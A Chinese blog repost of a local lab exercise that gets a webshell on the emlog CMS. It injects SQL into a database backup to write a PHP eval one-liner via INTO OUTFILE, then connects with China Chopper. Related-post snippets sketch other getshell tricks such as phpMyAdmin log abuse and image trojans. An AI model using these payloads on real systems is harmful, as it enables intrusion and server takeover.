php如何用菜刀连接getshell,2019-11-7:练习上传getshell,通过菜刀连接

最新推荐文章于 2023-10-28 18:32:19 发布
最新推荐文章于 2023-10-28 18:32:19 发布
阅读量479 收藏
点赞数
文章标签: php如何用菜刀连接getshell

一、使用phtstudy搭建环境

1,将emlog源码解压到phpstudy的www目录,复制emlog源码中的src所有文件到需要搭建emlog的目录中,修改emlog配置文件,输入好本机mysql账户信息,之后访问emlog,根据情况设置填写信息

38e68f107ee8aa83746effeb69f7de0c.png

09638f2e65f9888cfda8859b9aef0853.png

07a3210019737bec66c51762939cdf0a.png

二、寻找上传文件路径,上传getshell

查询资料发现后台admin界面有个信息泄漏漏洞,get action=phpinfo可以得到phpinfo,成功getshell需要利用下

7c5e18b196585a716f0f5263d6871f07.png

1,首页是没有上传按钮的,所以需要登录管理后台,登录之后在发布文章的地方有上传选项,允许类型有不少rar zip gif jpg jpeg png txt pdf docx doc xls xlsx

3242aff09b32e0bdb0bffe7df927f07d.png

2,上传webshell,准备好一句话php文件,直接上传,提示文件类型错误,明显直接上传php文件不行

69f935ce32ca06dafbb14ebd54c81dff.png

08e210f5d73f4059946f1dbf09d1a613.png

3,修改成网站允许的文件后缀名之后尝试上传,发现只是修改文件后缀之后就可以上传成功,截图显示图是裂的没关系,因为是直接将php改后缀的没有图像数据所以是正常现象

ba0ff7f96f391455bd94ee5bdd816a01.png

4,上传成功之后,我以为可以直接getshell,发现自己天真了,到网站上传路径,发现所有上传的文件都只能是图片类型或其他类型,直接传脚本的方式不可行了,需要找其他方法

6961687066d5e7d784393133cdecba8b.png

5,查找资料,发现后台有一个备份数据功能,还有导入本地备份功能,正式开始getshell

06f14161e78d387a79df5a0173c08ea8.png

6,点击备份数据,将数据库的文件备份出来,在最后加入以下语句

Drop TABLE IF EXISTS emglog_shell;

create table emlog_shell(`cmd` text(999) not null);

INSERT INTO emlog_shell VALUES (‘<?php @eval($_POST["aaa"]);?>‘);

Select cmd from emlog_shell into outfile ‘D:/phpstudy_pro/WWW/emlog/admin/shell.php‘;

Drop TABLE IF EXISTS emglog_shell;

b1665ad3eb9c8259577bc1b43ce0adc9.png

7,导入数据,发现成功导入shell.php

1001d47896ddb7e732be082be8e9a1d3.png

ad89eb8fffa207a8b076a300b969852f.png

8,菜刀配置连接,成功getshell

75fbd9d11f7aca4f78d4829da88ec086.png

原文:https://www.cnblogs.com/sym945/p/11815809.html

weixin_39805644
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php何用菜刀连接getshell,菜刀(代码执行)函数和命令执行函数详解及Getshell方法...
weixin_29730445的博客
03-16 892
@$temp = $_FILES['upload_file']['tmp_name'];@$file = basename($_FILES['upload_file']['name']);if (empty ($file)){echo "\n";echo "Local file: \n";echo "\n";echo "\n\n\n";}else {if(move_uploaded_file($t...
php何用菜刀连接getshell,phpmyadmin之getshell总结
weixin_34802266的博客
03-16 476
title: phpmyadmin中getshell的几种姿势1,利用全局变量general_log去getshellshow variables like ‘%general%’;然后将general_log打开,执行命令set global general_log=on;因为phpstudy默认的根目录是/phpstudy/www/,所以接下来只需要修改日志文件的位置到网站的根目录下。set ...
Getshell的各种姿势
qq_40806924的博客
06-28 1772
一、进后台Getshell 1、管理员后台直接Getshell 管理员后台直接上 如果被Waf拦截 上不加密的WebShell 先小???? 如果有权限改后台文件名 在文件名前加 …/尝试目录穿越 ex:a.php ->…/a.php 2、后台数据库备份Getshell图片马并获取图片马路径,通过数据库备份修改后缀名,如有后缀名无法修改或路径无法修改限制可修改前端代码绕过. 当所备份的数据库来源无法修改时,我们可以通过首先将一句话木马写入数据库,如通过新建管理员用户,将用户名用一句话木马代
一、菜刀(工具)
shark-CV的博客
04-17 188
渗透入门系列博客,为网络安全爱好者,提供一点入门的分享。 本文以菜刀作为切入,简单的讲解菜刀中使用技巧。
解决DVWA(Low级别)中国菜刀连接失败问题(php版本问题)
myec_lipse的博客
04-22 2600
今天在DVWA平台上上了个一句话木马,用中国菜刀连接了一下发现连接不上,百度了大半天,发现是php版本问题,之前在win7虚拟机上安装的XAMPP7的php版本是php7.x版本的,需要降低一下版本,度娘说降低到5.x版本就可以连接上了(因为啥咱也不知道咱也不敢问)。研究了半天感觉改来改去的太麻烦了就直接下了个XAMPP5,复制了一下XAMPP7的DVWA文件到XAMPP5上,在5的DVWA平台上上了一个一句话木马,菜刀就能正常连接了,棒呆! ...
Maccms8RceBypass_horsen9f_getshell_MacCMSgetshell_菜刀工具mac_eateni
09-11
这个工具主要功能是实现对目标系统获取shell权限,也就是所谓的“getshell”,并且可以使用“菜刀”工具进行连接。 【描述】中提到的“Mac8.0的一款getshell工具 直接一句话 用菜刀连就行了”意味着这个工具能够...
【菜鸟腾飞】简单的Getshell和windows提权_漏洞研究
11-01
【菜鸟腾飞】简单的Getshell和windows提权_漏洞研究【菜鸟腾飞】简单的Getshell和windows提权_漏洞研究
Maccms8RceBypass_horsen9f_getshell_MacCMSgetshell_mac_eateni
10-05
在黑客术语中,“getshell”通常指的是在成功利用漏洞后获取服务器命令执行的能力,这通常意味着攻击者可以下载、上文件,甚至控制系统。 “菜刀工具”是网络攻击中常用的管理远程服务器的工具,它提供了图形化的...
Maccms8RceBypass_horsen9f_getshell
09-29
Maccms8RceBypass_horsen9f_getshell_MacCMSgetshell_菜刀工具mac_eatenihy_源码.rar
第十三节 文件上-竞争条件-01
09-15
攻击者可以不断访问上的文件,然后上恶意文件, finally 使用菜刀连接一句话 Webshell。 总结: 文件上是 Web 应用程序中一个常见的功能,但是如果没有正确地实现文件上功能,可能会导致严重的安全问题。...
图片马的制作以及菜刀的使用
weixin_33774308的博客
12-05 6217
有些网站我们在拿shell的时候,会要用到上文件,但是有的时候都会有过滤,如果只是上.asp .php结尾的文件的话系统是不会给你上的,那么这个时候我们通常会利用一些其他的思路,比如说iis6中的解析漏洞,把一句话放到图片里面,写成1.asp;.jpg 1.asp;.jpg的格式上上去,这样上的时候文件会被检测为是图片,上成功之后会将这个文件当asp来解析 图片马是WEB渗透测...
中国菜刀使用教程
qq1140037586的博客
06-28 1435
中国菜刀使用教程
菜刀连接图片一句话木马
热门推荐
qq_18831583的博客
04-22 2万+
1、先制作图片一句话木马: 找好一张图片如”fox.jpg“,并且准备好一句话脚本php文件fox.php,在图片所在文件夹打开cmd命令行,执行命令:copy fox.jpg/b+fox.php/a fox1.jpg,生成图片一句话文件fox1.jpg 接下来用notepad++打开fox1.php图片,看看一句话也没有写入到图片当中,如图,一句话已经写入刀图片当中: ...
php何用菜刀连接getshell,ThinkPHP5 RCE GetShell漏洞
weixin_34847560的博客
03-16 382
由于ThinkPHP框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本复现漏洞:下载带有漏洞的ThinkPHP版本,本地搭建漏洞测试环境访问首页 public/index.php可以看到页面以及版本输入EXP代码http://192.168.1.102/thinkphp5/public/index.php?s=index/...
菜刀(代码执行)函数和命令执行函数详解及Getshell方法
dfdhxb995397的博客
06-11 883
i春秋作家:大家奥斯的哦 原文来自:https://bbs.ichunqiu.com/thread-41471-1-1.html 代码执行函数 VS 命令执行函数 一直想整理这两块的内容,但是一直没时间弄,直到前两天碰上一个写入了菜刀马但是死活连不上菜刀的站,顿时不知道怎么继续了,所以就趁这个机会整理了一下代码执行函数怎么getshell和命令执行函数怎么ge...
sqli-labs关卡7(结合文件上漏洞+一句马+菜刀)通关思路
最新发布
zyh1588的博客
10-28 1044
小白对sqli-labs第七关的理解
mysql中国菜刀连接_中国菜刀使用方法以及小技巧
weixin_34938347的博客
02-08 1838
相信大多数的站长都用FTP来管理web空间,但是相对于菜刀来说FTP简直弱到爆.就数据库管理方面来说,phpmyadmin和帝国软件只能管理mysql数据库,而且在软件的体积上跟菜刀完全没法比,如果精通SQL语法,何必还要PHPMYADMIN呢?而且中国菜刀以其特色图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS,支持ADO方式连接的数据库。服务端:在服务端运行的代...
一句话木马及菜刀的使用
weixin_33720078的博客
08-19 920
来一波原理: eval() 函数把字符串按照 PHP 代码来计算。该字符串必须是合法的 PHP 代码,且必须以分号结尾。如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false <?php @eval($_POST(‘1’);?> 各种绕过文件上的姿势:https://b...
  中国菜刀使用方法以及小技巧
weixin_33976072的博客
03-31 1645
相信大多数的站长都用FTP来管理web空间,但是相对于菜刀来说FTP简直弱到爆.就数据库管理方面来说,phpmyadmin和帝国软件只能管理mysql数据库,而且在软件的体积上跟菜刀完全没法比,如果精通SQL语法,何必还要PHPMYADMIN呢?而且中国菜刀以其特×××形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS,支持ADO方式连接的数据库。...
创建出满足下述三个条件的视图(视图名称为 ViewPractice5_1)。使用 product(商品)表作为参照表,假设表中包含初始状态的 8 行数据。 条件 1:销售单价大于等于 1000 日元。 条件 2:登记日期是 2009 年 9 月 20 日。 条件 3:包含商品名称、销售单价和登记日期三列。 对该视图执行 SELECT 语句的结果如下所示。 SELECT * FROM ViewPractice5_1; 执行结果 product_name | sale_price | regist_date --------------+------------+------------ T恤衫 |   1000 | 2009-09-20 菜刀 | 3000 | 2009-09-20
06-01
以下是创建视图 ViewPractice5_1 的 SQL 语句: ``` CREATE VIEW ViewPractice5_1 AS SELECT product_name, sale_price, regist_date FROM product WHERE sale_price >= 1000 AND ...菜刀 | 3000 | 2009-09-20 ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值